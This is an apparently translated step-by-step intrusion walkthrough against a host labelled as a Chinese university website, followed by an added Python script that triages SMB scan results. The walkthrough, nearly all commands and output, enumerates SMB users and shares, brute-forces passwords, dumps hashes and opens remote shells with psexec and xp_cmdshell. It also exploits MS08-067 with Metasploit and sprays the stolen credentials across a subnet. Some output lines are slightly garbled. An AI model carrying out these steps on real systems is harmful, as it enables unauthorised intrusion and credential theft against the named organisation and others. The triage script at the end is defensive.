Guangxi Normal University website http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.2418)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // dump the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "    // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // exploit the MS08-067 vulnerability against the target from msf

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful: a simple msf + nmap attack.
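The same NSE scans are what a defender runs to find these weaknesses before anyone else does. The following triage helper is an added example (not part of the original post): it reads nmap's normal output and turns the smb-brute, smb-enum-shares and smb-check-vulns host-script lines into prioritised findings. The sample block is constructed from the output above, not a captured file.

```python
"""Triage helper for SMB NSE results (added example, not the original post's code)."""
import re

# Constructed sample modelled on the host-script output above, not a captured file.
SAMPLE = """\
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

LOGIN_RE = re.compile(r"^(\S+):(\S+) => Login was successful$")
VULN_RE = re.compile(r"^(\S+): VULNERABLE$")
ANON_RE = re.compile(r"^Anonymous access: (.+)$")

def triage(report: str) -> list[tuple[str, str, str]]:
    """Walk nmap's normal output; return (severity, nse script, detail) per finding."""
    findings = []
    script = share = None
    for raw in report.splitlines():
        if not raw.startswith("|"):
            continue                       # port table, banners, "Nmap done" etc.
        line = raw.lstrip("|_ ").strip()   # drop nmap's tree prefix ("|", "|_")
        if line.startswith("smb-") and line.endswith(":"):
            script, share = line[:-1], None    # start of a new script section
        elif script == "smb-brute" and (m := LOGIN_RE.match(line)):
            blank = m.group(2) == "<blank>"    # empty password outranks a guessable one
            findings.append(("CRITICAL" if blank else "HIGH", script,
                             f"{m.group(1)}: {'empty' if blank else 'guessable'} password"))
        elif script == "smb-enum-shares":
            m = ANON_RE.match(line)
            if m is None:
                share = line                   # a bare share name such as IPC$
            elif share and m.group(1) != "<none>":
                findings.append(("HIGH", script, f"{share}: anonymous {m.group(1)}"))
        elif script == "smb-check-vulns" and (m := VULN_RE.match(line)):
            findings.append(("CRITICAL", script, f"{m.group(1)}: unpatched"))
    return findings

if __name__ == "__main__":
    for sev, nse, detail in triage(SAMPLE):
        print(f"[{sev}] {nse}: {detail}")
```

Feed it `nmap -oN` output from a scheduled internal scan and the blank-password accounts, anonymous-readable shares and unpatched hosts surface as a short fix list.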